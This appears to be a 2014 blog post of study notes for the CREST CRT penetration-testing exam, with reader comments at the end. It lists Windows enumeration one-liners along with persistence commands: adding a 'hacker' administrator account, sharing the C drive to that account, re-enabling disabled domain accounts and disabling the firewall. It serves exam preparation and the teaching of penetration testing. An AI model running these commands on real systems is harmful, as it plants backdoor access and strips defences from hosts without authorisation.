Wednesday, 31 December 2014

CREST CRT Exam Preparation

I'm going to be taking the CREST CRT exam in January and wanted to share my preparation notes with the world to save everyone else the time and effort of digging up this information to pass the exam.

Note: I have not taken the exam yet, I do not know the answers and am in no way affiliated with CREST.Note Note: I passed the exam. Due to confidentiality reasons I can't provide any hints I will however leave this post up to assist future participants :)

What have we gota do?

First things first, the official CREST site and CRT page is here:
http://www.crest-approved.org/information-security-testers/registered-tester/index.html

To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."

For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.

Getting hands-on!

My goal during the practical exam is to be as quick and efficient as possible. I want to minimize time spent analyzing results, configuring tools or writing custom stuff and maximize time spent answering questions! I plan to use a Windows box with Kali Linux VM. Below is my full list of tools and one-liners:

The “b” flag makes the command take longer but will output the process name using each of the connections.

netsh diag show all

{XP only} Shows information on network services and adapters

net view

Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup or domain.

net view /domain

List all domains available to the host

net view /domain:otherdomain

Queries NBNS/SMB (SAMBA) and tries to find all hosts in the ‘otherdomain’

net user %USERNAME% /domain

Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership

net user /domain

Lists all of the domain users

net accounts

Prints the password policy for the local system. This can be different and superseded by the domain policy.

net accounts /domain

Prints the password policy for the domain

net localgroup administrators

Prints the members of the Administrators local group

net localgroup administrators /domain

as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins

net group “Domain Admins” /domain

Prints the members of the Domain Admins group

net group “Enterprise Admins” /domain

Prints the members of the Enterprise Admins group

net group “Domain Controllers” /domain

Prints the list of Domain Controllers for the current domain

net share

Displays your currently shared SMB entries, and what path(s) they point to

net session | find / “\\”

arp -a

Lists all the systems currently in the machine’s ARP table.

route print

Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place

whoami

View the current user

tasklist /v

List processes

taskkill /F /IM "cmd.exe"

Kill a process by its name

net user hacker hacker /add

Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’

net localgroup administrators hacker /add

Adds the new user ‘hacker’ to the local administrators group

net share nothing$=C:\ /grant:hacker,FULL /unlimited

Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind

net user username /active:yes /domain

Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.

netsh firewall set opmode disable

Disables the local windows firewall

wmic useraccount get name,sid - Retrieve name and sid from command line.

It's still early days for me, however I have done lots of training over the years (10+), SCP, Security+, Backtrack 101, CISSP, CEH, ECSA. Now, I know many of the courses I have done are only touching the tip of the iceberg in relation to Pen-Testing but as I am out of work I was wondering if it would be reasonable to skip the training and just take the exam?

Like any exam it's wise to revise and prepare accordingly. The amount of prep depends on your experience. For the CRT if you have a few years security/pentesting experience you should be fine. Without practical experience though you may find it hard.

Does this exam follow CTF fashion ? Where you have to own different boxes? Apart from that, which is the level of detail requested in the exam? Do you have to know every single thing from IPSec for instance?

Hi, great post! One more question?Do I need to get root to the exam boxes to find all the answers or is just enough to make scans and enumerate the machine to find its?Please advise. I looking to book the exam ASAP. Thanks